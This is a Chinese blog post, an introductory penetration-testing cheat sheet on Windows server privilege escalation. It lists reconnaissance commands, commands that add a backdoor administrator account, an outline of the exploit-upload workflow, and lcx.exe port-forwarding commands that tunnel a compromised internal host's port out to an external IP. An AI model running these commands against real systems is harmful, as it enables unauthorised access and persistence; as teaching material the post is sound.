美文网首页
【渗透测试】-服务器提权之初入茅庐

【渗透测试】-服务器提权之初入茅庐

作者: lndyzwdxhs | 来源:发表于2017-08-11 13:31 被阅读105次

0x01:什么情况下会用到提权?

  • 旁注
    • 对同服务器下的不同站点进行渗透,达到对目标站点的渗透
  • C段
    • 对同网段下的不同服务器进行渗透,达到对目标服务器的目标站点的渗透

0x02:提权常用命令

  • Windows:
    • Whoami 查看当前操作用户
    • Ipconfig ip地址获取命令
    • Net user用户操作命令
      • Net user cs 123456 /add 添加用户名cs,密码123456的用户
      • Net user cs /del 删除用户cs
      • Net localgroup administrators cs /add 将用户cs添加到本地管理员组
    • Tasklist /svc 进程获取命令
    • Netstat -ano 网络端口命令
    • Systeminfo 计算机信息获取命令
  • Linux:
    • 待续...

0x03:提权技术分类

  • 溢出漏洞提权
    • 提权准备,信息收集(操作系统版本、位数、补丁情况、有无防护软件)
    • 对比补丁及操作系统信息,筛选出exp(可以使用提权exp工具)
    • 执行exp进行提权
      • 寻找可读可写目录(目录探测工具或者webshell自带),上传exp
      • 执行exp,添加用户并设置为管理员权限,远程连接
  • 数据库提权
  • 第三方软件提权

0x04:提权遇到的问题?

  • cmd无法执行

    • cmd被删除

      • 绕过思路:找可读可写目录,上传cmd.exe
    • cmd被降权

      • 绕过思路:找可读可写目录,上传cmd.exe
    • 组件被删除

      • 切换组件
    • 防护软件拦截

      • 很难绕过
  • 3389无法连接

    • 端口被修改
      • 找端口(1-65535),使用端口扫描工具、注册表读取、查询PID
    • 端口被关闭
      • 上传3389打开工具到可读可写目录,需要先提权,调用执行exe工具
    • 内网环境
      • 端口转发:
        1. 外网服务器:lcx.exe -listen 1234 4321 (监听1234端口的流量并将其转发至本地4321端口)
        2. 内网肉鸡:lcx.exe -slave 121.43.99.73 1234 192.168.1.106 1111 (将本地192.168.1.106的1111端口流量转发至121.43.99.73的1234端口上)
        3. 外网 连接本地端口4321 即代表连接肉鸡的1111端口
    • 防护软件拦截
      • 很困难

欢迎关注微信公众号(coder0x00)或扫描下方二维码关注,我们将持续搜寻程序员必备基础技能包提供给大家。


相关文章

网友评论

      本文标题:【渗透测试】-服务器提权之初入茅庐

      本文链接:https://www.haomeiwen.com/subject/mmblrxtx.html